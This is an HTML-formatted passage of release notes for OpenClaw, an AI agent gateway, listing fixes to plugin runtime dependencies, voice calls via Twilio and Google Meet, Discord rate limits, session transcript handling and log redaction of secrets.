<p>Plugins/runtime-deps: treat package.json runtime-deps manifests as supersets when generated materialization metadata is absent, so bundled plugin activation stops restaging already-installed dependency subsets on every activation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362879118" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75429" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75429/hovercard" href="https://github.com/openclaw/openclaw/issues/75429">#75429</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362889795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75431" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75431/hovercard" href="https://github.com/openclaw/openclaw/pull/75431">#75431</a>) Thanks @loyur.</p>
</li>
<li>
<p>iMessage: add stdin write callback and error listener to IMessageRpcClient so async EPIPE from a closed child process rejects the pending request instead of crashing the gateway with uncaughtException. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</p>
</li>
<li>
<p>MCP/stdio: settle MCP stdio transport send() from the write callback instead of resolving immediately on buffer acceptance, so async write errors reject the promise instead of being lost. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</p>
</li>
<li>
<p>Process/exec: add stdin error listener in runCommandWithTimeout so EPIPE from a prematurely-exited child is swallowed instead of escaping to uncaughtException. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</p>
</li>
<li>
<p>Voice Call/realtime: add default-off fast memory/session context for <code>openclaw_agent_consult</code>, giving live calls a bounded answer-or-miss path before the full agent consult. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329662019" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71849" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71849/hovercard" href="https://github.com/openclaw/openclaw/issues/71849">#71849</a>. Thanks @amzzzzzzz.</p>
</li>
<li>
<p>Google Meet: interrupt Realtime provider output when local barge-in clears playback, so command-pair audio stops model speech instead of only restarting Chrome playback. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346767837" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73850/hovercard" href="https://github.com/openclaw/openclaw/issues/73850">#73850</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346567653" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73834" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73834/hovercard" href="https://github.com/openclaw/openclaw/pull/73834">#73834</a>) Thanks @shhtheonlyperson.</p>
</li>
<li>
<p>Gateway/config: cap oversized plugin-owned schemas in the full <code>config.schema</code> response so large installed plugin sets cannot balloon Gateway RSS or crash schema clients. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/update: skip ClawHub and marketplace plugin updates when the bundled version is newer than the recorded installed version, so <code>openclaw update</code> no longer overwrites working bundled plugins with older external packages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363046993" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75447" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75447/hovercard" href="https://github.com/openclaw/openclaw/issues/75447">#75447</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Gateway/sessions: use bounded tail reads for sessions-list transcript usage fallbacks and cap bulk title/last-message hydration, keeping large session stores responsive when rows request derived previews. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/sessions: yield during bulk transcript title/preview hydration and copy compaction checkpoints asynchronously, keeping the Gateway event loop responsive for large session stores and large transcripts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362222686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75330" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75330/hovercard" href="https://github.com/openclaw/openclaw/issues/75330">#75330</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362708402" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75414" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75414/hovercard" href="https://github.com/openclaw/openclaw/issues/75414">#75414</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Gateway/sessions: stream bounded transcript reads for session detail, history, artifacts, compaction, and send/subscribe sequence paths so small Gateway requests no longer materialize large transcripts or OOM on oversized session logs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/chat: bound chat-history transcript reads to the requested display window so large session logs no longer OOM the Gateway when clients ask for a small history page. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>BlueBubbles: detect audio attachments by Apple UTIs (<code>public.audio</code>, <code>public.mpeg-4-audio</code>, <code>com.apple.m4a-audio</code>, <code>com.apple.coreaudio-format</code>) in addition to <code>audio/*</code> MIME, so iMessage voice notes whose webhook payload only carries the UTI are now classified as audio in the inbound <code>&lt;media:audio&gt;</code> placeholder instead of falling through to the generic <code>&lt;media:attachment&gt;</code> tag. Thanks @omarshahine.</p>
</li>
<li>
<p>Voice Call/Twilio: honor stored pre-connect TwiML before realtime webhook shortcuts and reject DTMF sequences outside conversation mode, so Meet PIN entry cannot be skipped or silently dropped. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Docs/sandboxing: clarify that sandbox setup scripts (<code>sandbox-setup.sh</code>, <code>sandbox-common-setup.sh</code>, <code>sandbox-browser-setup.sh</code>) are only available from a source checkout, and add inline <code>docker build</code> commands for npm-installed users so sandbox image setup works without cloning the repo. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363242333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75485" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75485/hovercard" href="https://github.com/openclaw/openclaw/issues/75485">#75485</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Google Meet/Voice Call: play Twilio Meet DTMF before opening the realtime media stream and carry the intro as the initial Voice Call message, so the greeting is generated after Meet admits the phone participant instead of racing a live-call TwiML update. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Google Meet/Voice Call: make Twilio setup preflight honor explicit <code>--transport twilio</code> and fail local/private Voice Call webhook URLs, including IPv6 loopback and unique-local forms, before joins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Voice Call/Twilio: retry transient 21220 live-call TwiML updates and catch answered-path initial-greeting failures, so a fast answered callback no longer crashes the Gateway or drops the Twilio greeting/listen transition. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353522708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74606" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74606/hovercard" href="https://github.com/openclaw/openclaw/pull/74606">#74606</a>) Thanks @Sivan22.</p>
</li>
<li>
<p>CLI/startup: preserve <code>OPENCLAW_HIDE_BANNER</code> banner suppression for route-first startup callers that rely on the default process environment while keeping read-only status/channel paths from repairing bundled plugin runtime dependencies. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360048495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75183/hovercard" href="https://github.com/openclaw/openclaw/pull/75183">#75183</a>.</p>
</li>
<li>
<p>Voice Call/Twilio: register accepted media streams immediately but wait for realtime transcription readiness before speaking the initial greeting, so reconnect grace handling stays live while OpenAI STT startup is no longer starved by TTS. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360162005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75197" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75197/hovercard" href="https://github.com/openclaw/openclaw/issues/75197">#75197</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361111739" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75257" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75257/hovercard" href="https://github.com/openclaw/openclaw/pull/75257">#75257</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Voice Call CLI: run gateway-delegated <code>voicecall continue</code> through operation-id polling and protocol-shaped errors, so long conversational turns keep their transcript result without blocking a single Gateway RPC. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363097375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75459" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75459/hovercard" href="https://github.com/openclaw/openclaw/pull/75459">#75459</a>) Thanks @serrurco and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Voice Call CLI: delegate operational <code>voicecall</code> commands to the running Gateway runtime and skip webhook startup during CLI-only plugin loading, preventing webhook port conflicts and <code>setup --json</code> hangs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331824729" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72345" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72345/hovercard" href="https://github.com/openclaw/openclaw/issues/72345">#72345</a>. Thanks @serrurco and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Agents/pi-embedded-runner: extract the <code>abortable</code> provider-call wrapper from <code>runEmbeddedAttempt</code> to module scope so its promise handlers no longer close over the run lexical context, releasing transcripts, tool buffers, and subscription callbacks when a provider call hangs past abort. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348625606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74182" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74182/hovercard" href="https://github.com/openclaw/openclaw/issues/74182">#74182</a>) Thanks @cjboy007.</p>
</li>
<li>
<p>Docker: restore <code>python3</code> in the gateway runtime image after the slim-runtime switch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357583202" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75041" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75041/hovercard" href="https://github.com/openclaw/openclaw/issues/75041">#75041</a>.</p>
</li>
<li>
<p>Agents/session-repair: fix resumed sessions failing with repeated 400 errors on Anthropic and strict OpenAI-compatible providers (Qwen, mlx-vlm) after an interrupted conversation or blank user input. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361379280" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75271" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75271/hovercard" href="https://github.com/openclaw/openclaw/issues/75271">#75271</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362043132" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75313" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75313/hovercard" href="https://github.com/openclaw/openclaw/issues/75313">#75313</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>CLI/Voice Call: scope <code>voicecall</code> command activation to the Voice Call plugin so setup and smoke checks no longer broad-load unrelated plugin runtimes or hang after printing JSON. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Doctor/plugins: warn when restrictive <code>plugins.allow</code> is paired with wildcard or plugin-owned tool allowlists, making the exclusive plugin allowlist behavior visible before users hit empty callable-tool runs. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4174851981" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58009" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58009/hovercard" href="https://github.com/openclaw/openclaw/issues/58009">#58009</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245604493" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64982" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64982/hovercard" href="https://github.com/openclaw/openclaw/issues/64982">#64982</a>. Thanks @KR-Python and @BKF-Gitty.</p>
</li>
<li>
<p>Google Meet/Voice Call: keep Twilio Meet joins in conversation mode and reuse the realtime intro prompt when no voice-call-specific intro is configured, so answered phone bridge calls speak instead of joining silently. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Auto-reply/group chats: keep the <code>message</code> tool available for message-tool-only visible replies and apply group-scoped tool policy before deciding fallback delivery, so Discord/Slack-style rooms reply visibly in the correct channel after upgrades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355291678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74842" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74842/hovercard" href="https://github.com/openclaw/openclaw/issues/74842">#74842</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360452638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75207" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75207/hovercard" href="https://github.com/openclaw/openclaw/issues/75207">#75207</a>. Thanks @davelutztx and @aa-on-ai.</p>
</li>
<li>
<p>Agents/commitments: keep inferred follow-ups internal when heartbeat target is none, strip raw source text from stored commitments, disable tools during due-commitment heartbeat turns, bound hidden extraction queue growth, expire stale commitments, and add QA/Docker safety coverage. Thanks @vignesh07.</p>
</li>
<li>
<p>Telegram/agents: keep typing indicators and optional generation tools off the reply critical path, so fresh Telegram replies no longer stall while provider catalogs and media models load. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362421293" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75360" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75360/hovercard" href="https://github.com/openclaw/openclaw/pull/75360">#75360</a>) Thanks @obviyus.</p>
</li>
<li>
<p>Agents/commitments: run hidden follow-up extraction on the configured agent/default model instead of falling back to direct OpenAI, so OpenAI Codex OAuth-only gateways no longer spam background API-key failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362274024" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75334" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75334/hovercard" href="https://github.com/openclaw/openclaw/issues/75334">#75334</a>. Thanks @sene1337.</p>
</li>
<li>
<p>Agents/media: keep async music generation completions on the requester-session wake path even when direct-send completion is enabled, so finished audio stays agent-mediated while video can still opt into direct channel delivery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362275213" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75335" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75335/hovercard" href="https://github.com/openclaw/openclaw/pull/75335">#75335</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Security/config-audit: redact CLI argv and execArgv secrets before persisting config audit records, covering write, observe, and recovery paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204612186" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60826" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60826/hovercard" href="https://github.com/openclaw/openclaw/issues/60826">#60826</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koshaji/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koshaji">@koshaji</a>.</p>
</li>
<li>
<p>Gateway/models: keep default and configured model-list views responsive when provider catalog discovery stalls, without hiding real catalog load failures, while <code>--all</code> still waits for the exact full catalog. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361752617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75297" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75297/hovercard" href="https://github.com/openclaw/openclaw/issues/75297">#75297</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351397259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74404" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74404/hovercard" href="https://github.com/openclaw/openclaw/issues/74404">#74404</a>. Thanks @lisandromachado and @najef1979-code.</p>
</li>
<li>
<p>Plugins/runtime-deps: accept already materialized package-level runtime-deps supersets as converged, so later lazy plugin activation no longer prunes and relaunches <code>pnpm install</code> after gateway startup pre-staging, reducing event-loop pressure from repeated runtime-deps repair on packaged installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361752617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75297" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75297/hovercard" href="https://github.com/openclaw/openclaw/issues/75297">#75297</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331750102" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72338" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72338/hovercard" href="https://github.com/openclaw/openclaw/issues/72338">#72338</a>. Thanks @brokemac79, @lisandromachado, and @midhunmonachan.</p>
</li>
<li>
<p>Plugins/runtime-deps: remove OpenClaw-owned legacy runtime-deps symlinks before replacing staged bundled plugin dependencies, so updates can recover from older symlinked installs instead of failing the symlink safety guard. Thanks @goldmar.</p>
</li>
<li>
<p>Discord: retry queued REST 429s against learned bucket/global cooldowns and reacquire fresh voice upload URLs after CDN upload rate limits, so outbound sends recover without reusing stale single-use upload URLs. Thanks @discord.</p>
</li>
<li>
<p>TTS/providers: keep bundled speech-provider compat fallback available when plugins are globally disabled, so cold gateway and CLI startup can still resolve fallback speech providers instead of leaving explicit TTS provider selection with no registered providers. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361272168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75265" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75265/hovercard" href="https://github.com/openclaw/openclaw/pull/75265">#75265</a>. Thanks @sliekens.</p>
</li>
<li>
<p>Discord: collapse repeated native slash-command deploy rate-limit startup logs into one non-fatal warning while keeping per-request REST timing in verbose output. Thanks @discord.</p>
</li>
<li>
<p>Discord: report native slash-command deploy aborts as REST timeouts with method, path, timeout budget, and observed duration, so startup logs explain slow Discord API calls instead of showing a generic aborted operation. Thanks @discord.</p>
</li>
<li>
<p>Security/logging: redact payment credential field names such as card number, CVC/CVV, shared payment token, and payment credential across default log and tool-payload redaction patterns so wallet-style MCP tools do not expose raw payment credentials in UI events or transcripts. Thanks @stainlu.</p>
</li>
<li>
<p>Providers/OpenAI Codex: preserve existing wrapped Codex streams during OpenAI attribution so PI OAuth bearer injection reaches ChatGPT/Codex Responses, and strip native Codex-only unsupported payload fields without touching custom compatible endpoints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358840684" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75111" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75111/hovercard" href="https://github.com/openclaw/openclaw/pull/75111">#75111</a>) Thanks @keshavbotagent.</p>
</li>
<li>
<p>Plugins/runtime-deps: materialize newly required bundled plugin packages after local <code>openclaw onboard</code> and <code>openclaw configure</code> config writes, while keeping remote setup read-only, so first Gateway startup no longer discovers missing channel/provider deps after setup claimed success. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @scottgl9 and @xiaohuaxi.</p>
</li>
<li>
<p>Plugins/runtime-deps: expire stale legacy install locks whose live PID cannot be tied to the current process incarnation, so Docker PID reuse no longer leaves bundled dependency repair stuck behind old <code>.openclaw-runtime-deps.lock</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356320468" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74948" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74948/hovercard" href="https://github.com/openclaw/openclaw/issues/74948">#74948</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356328081" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74950" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74950/hovercard" href="https://github.com/openclaw/openclaw/pull/74950">#74950</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350782800" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74346" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74346/hovercard" href="https://github.com/openclaw/openclaw/issues/74346">#74346</a>. Thanks @dchekmarev.</p>
</li>
<li>
<p>Plugins/runtime-deps: recover interrupted bundled runtime-dependency installs whose package sentinels exist but generated materialization is incomplete, forcing npm/pnpm repair in Gateway startup, doctor, and lazy plugin loads instead of leaving channels crash-looping on missing packages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361991170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75310" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75310/hovercard" href="https://github.com/openclaw/openclaw/pull/75310">#75310</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361740220" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75296" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75296/hovercard" href="https://github.com/openclaw/openclaw/issues/75296">#75296</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361883653" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75304" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75304/hovercard" href="https://github.com/openclaw/openclaw/issues/75304">#75304</a>. Thanks @scottgl9.</p>
</li>
<li>
<p>Plugins/runtime-deps: treat no-main and export-map package sentinels without reachable entry files as incomplete, so Gateway startup, doctor, and lazy plugin loads repair interrupted bundled dependency installs instead of accepting package.json-only partial installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360048495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75183/hovercard" href="https://github.com/openclaw/openclaw/pull/75183">#75183</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: keep runtime inspection and channel maintenance commands from downloading bundled plugin dependencies, route explicit repairs through <code>openclaw plugins deps --repair</code>, and still allow Gateway/DO paths to repair missing deps before import. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @xiaohuaxi.</p>
</li>
<li>
